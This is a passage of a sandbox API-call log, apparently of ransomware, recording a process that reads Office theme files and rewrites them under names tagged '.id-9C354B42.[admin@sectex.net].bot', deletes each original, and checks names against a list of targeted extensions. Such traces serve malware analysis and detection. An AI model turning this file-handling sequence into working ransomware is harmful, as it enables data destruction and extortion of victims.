	[0141.999] WriteFile (in: hFile=0x3b4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0141.999] SetEndOfFile (hFile=0x3b4) returned 1
	[0142.000] CloseHandle (hObject=0x3b4) returned 1
	[0142.000] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.000] SetEndOfFile (hFile=0x3a8) returned 1
	[0142.002] CloseHandle (hObject=0x3a8) returned 1
	[0142.002] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.004] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx")) returned 1
	[0142.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78
	[0142.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78
	[0142.005] lstrlenW (lpString=".doc") returned 4
	[0142.005] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.005] lstrlenW (lpString=".docx") returned 5
	[0142.005] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.005] lstrlenW (lpString=".pdf") returned 4
	[0142.005] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.005] lstrlenW (lpString=".xls") returned 4
	[0142.005] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.005] lstrlenW (lpString=".xlsx") returned 5
	[0142.005] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.005] lstrlenW (lpString=".ppt") returned 4
	[0142.005] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78
	[0142.005] lstrlenW (lpString=".zip") returned 4
	[0142.005] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.005] lstrlenW (lpString=".rar") returned 4
	[0142.005] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.005] lstrlenW (lpString=".bz2") returned 4
	[0142.005] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.006] lstrlenW (lpString=".7z") returned 3
	[0142.006] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78
	[0142.006] lstrlenW (lpString=".dbf") returned 4
	[0142.006] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78
	[0142.006] lstrlenW (lpString=".1cd") returned 4
	[0142.006] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78
	[0142.006] lstrlenW (lpString=".jpg") returned 4
	[0142.006] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78
	[0142.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78
	[0142.006] lstrlenW (lpString=".doc") returned 4
	[0142.006] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.006] lstrlenW (lpString=".docx") returned 5
	[0142.006] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.006] lstrlenW (lpString=".pdf") returned 4
	[0142.006] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.006] lstrlenW (lpString=".xls") returned 4
	[0142.006] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.006] lstrlenW (lpString=".xlsx") returned 5
	[0142.006] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.006] lstrlenW (lpString=".ppt") returned 4
	[0142.006] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78
	[0142.006] lstrlenW (lpString=".zip") returned 4
	[0142.006] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.006] lstrlenW (lpString=".rar") returned 4
	[0142.006] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.006] lstrlenW (lpString=".bz2") returned 4
	[0142.006] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.006] lstrlenW (lpString=".7z") returned 3
	[0142.007] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78
	[0142.007] lstrlenW (lpString=".dbf") returned 4
	[0142.007] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78
	[0142.007] lstrlenW (lpString=".1cd") returned 4
	[0142.007] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78
	[0142.007] lstrlenW (lpString=".jpg") returned 4
	[0142.007] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.007] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0142.007] lstrlenW (lpString="Metro.eftx") returned 10
	[0142.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0142.008] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=24117) returned 1
	[0142.008] CloseHandle (hObject=0x3a8) returned 1
	[0142.008] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx")) returned 0x20
	[0142.008] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.008] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0142.009] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.009] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0142.009] GetLastError () returned 0x0
	[0142.009] ReadFile (in: hFile=0x3a8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x5e35, lpOverlapped=0x0) returned 1
	[0142.011] WriteFile (in: hFile=0x3b4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x5e40, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x5e40, lpOverlapped=0x0) returned 1
	[0142.012] ReadFile (in: hFile=0x3a8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.012] WriteFile (in: hFile=0x3b4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0142.012] SetEndOfFile (hFile=0x3b4) returned 1
	[0142.012] CloseHandle (hObject=0x3b4) returned 1
	[0142.012] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.012] SetEndOfFile (hFile=0x3a8) returned 1
	[0142.074] CloseHandle (hObject=0x3a8) returned 1
	[0142.074] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.074] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx")) returned 1
	[0142.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77
	[0142.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77
	[0142.075] lstrlenW (lpString=".doc") returned 4
	[0142.075] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.075] lstrlenW (lpString=".docx") returned 5
	[0142.075] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.075] lstrlenW (lpString=".pdf") returned 4
	[0142.075] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.075] lstrlenW (lpString=".xls") returned 4
	[0142.075] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.075] lstrlenW (lpString=".xlsx") returned 5
	[0142.075] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.075] lstrlenW (lpString=".ppt") returned 4
	[0142.075] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77
	[0142.075] lstrlenW (lpString=".zip") returned 4
	[0142.075] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.075] lstrlenW (lpString=".rar") returned 4
	[0142.075] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.075] lstrlenW (lpString=".bz2") returned 4
	[0142.075] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.075] lstrlenW (lpString=".7z") returned 3
	[0142.075] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77
	[0142.075] lstrlenW (lpString=".dbf") returned 4
	[0142.075] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77
	[0142.075] lstrlenW (lpString=".1cd") returned 4
	[0142.075] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77
	[0142.075] lstrlenW (lpString=".jpg") returned 4
	[0142.075] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77
	[0142.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77
	[0142.075] lstrlenW (lpString=".doc") returned 4
	[0142.075] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.076] lstrlenW (lpString=".docx") returned 5
	[0142.076] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.076] lstrlenW (lpString=".pdf") returned 4
	[0142.076] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.076] lstrlenW (lpString=".xls") returned 4
	[0142.076] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.076] lstrlenW (lpString=".xlsx") returned 5
	[0142.076] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.076] lstrlenW (lpString=".ppt") returned 4
	[0142.076] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77
	[0142.076] lstrlenW (lpString=".zip") returned 4
	[0142.076] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.076] lstrlenW (lpString=".rar") returned 4
	[0142.076] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.076] lstrlenW (lpString=".bz2") returned 4
	[0142.076] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.076] lstrlenW (lpString=".7z") returned 3
	[0142.076] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77
	[0142.076] lstrlenW (lpString=".dbf") returned 4
	[0142.076] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77
	[0142.076] lstrlenW (lpString=".1cd") returned 4
	[0142.076] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77
	[0142.076] lstrlenW (lpString=".jpg") returned 4
	[0142.076] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.077] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0142.077] lstrlenW (lpString="Oriel.eftx") returned 10
	[0142.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0142.265] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=43193) returned 1
	[0142.265] CloseHandle (hObject=0x3d0) returned 1
	[0142.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx")) returned 0x20
	[0142.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0142.265] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.265] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0142.266] GetLastError () returned 0x0
	[0142.266] ReadFile (in: hFile=0x3d0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xa8b9, lpOverlapped=0x0) returned 1
	[0142.268] WriteFile (in: hFile=0x3c0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xa8c0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xa8c0, lpOverlapped=0x0) returned 1
	[0142.270] ReadFile (in: hFile=0x3d0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.270] WriteFile (in: hFile=0x3c0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0142.270] SetEndOfFile (hFile=0x3c0) returned 1
	[0142.270] CloseHandle (hObject=0x3c0) returned 1
	[0142.271] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.271] SetEndOfFile (hFile=0x3d0) returned 1
	[0142.274] CloseHandle (hObject=0x3d0) returned 1
	[0142.274] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.274] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx")) returned 1
	[0142.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77
	[0142.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77
	[0142.275] lstrlenW (lpString=".doc") returned 4
	[0142.275] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.275] lstrlenW (lpString=".docx") returned 5
	[0142.275] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.275] lstrlenW (lpString=".pdf") returned 4
	[0142.275] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.275] lstrlenW (lpString=".xls") returned 4
	[0142.275] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.275] lstrlenW (lpString=".xlsx") returned 5
	[0142.275] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.275] lstrlenW (lpString=".ppt") returned 4
	[0142.275] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77
	[0142.275] lstrlenW (lpString=".zip") returned 4
	[0142.275] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.275] lstrlenW (lpString=".rar") returned 4
	[0142.275] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.275] lstrlenW (lpString=".bz2") returned 4
	[0142.275] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.275] lstrlenW (lpString=".7z") returned 3
	[0142.275] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77
	[0142.275] lstrlenW (lpString=".dbf") returned 4
	[0142.275] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77
	[0142.275] lstrlenW (lpString=".1cd") returned 4
	[0142.275] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77
	[0142.275] lstrlenW (lpString=".jpg") returned 4
	[0142.275] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77
	[0142.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77
	[0142.276] lstrlenW (lpString=".doc") returned 4
	[0142.276] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.276] lstrlenW (lpString=".docx") returned 5
	[0142.276] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.276] lstrlenW (lpString=".pdf") returned 4
	[0142.276] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.276] lstrlenW (lpString=".xls") returned 4
	[0142.276] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.276] lstrlenW (lpString=".xlsx") returned 5
	[0142.276] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.276] lstrlenW (lpString=".ppt") returned 4
	[0142.276] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77
	[0142.276] lstrlenW (lpString=".zip") returned 4
	[0142.276] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.276] lstrlenW (lpString=".rar") returned 4
	[0142.276] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.276] lstrlenW (lpString=".bz2") returned 4
	[0142.276] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.276] lstrlenW (lpString=".7z") returned 3
	[0142.276] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77
	[0142.276] lstrlenW (lpString=".dbf") returned 4
	[0142.276] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77
	[0142.276] lstrlenW (lpString=".1cd") returned 4
	[0142.276] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77
	[0142.276] lstrlenW (lpString=".jpg") returned 4
	[0142.276] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.277] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0142.277] lstrlenW (lpString="Technic.eftx") returned 12
	[0142.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0142.278] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=23692) returned 1
	[0142.278] CloseHandle (hObject=0x3d0) returned 1
	[0142.278] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx")) returned 0x20
	[0142.278] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0142.278] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.278] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0142.279] GetLastError () returned 0x0
	[0142.279] ReadFile (in: hFile=0x3d0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x5c8c, lpOverlapped=0x0) returned 1
	[0142.328] WriteFile (in: hFile=0x3c0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x5c90, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x5c90, lpOverlapped=0x0) returned 1
	[0142.329] ReadFile (in: hFile=0x3d0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.329] WriteFile (in: hFile=0x3c0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0142.329] SetEndOfFile (hFile=0x3c0) returned 1
	[0142.329] CloseHandle (hObject=0x3c0) returned 1
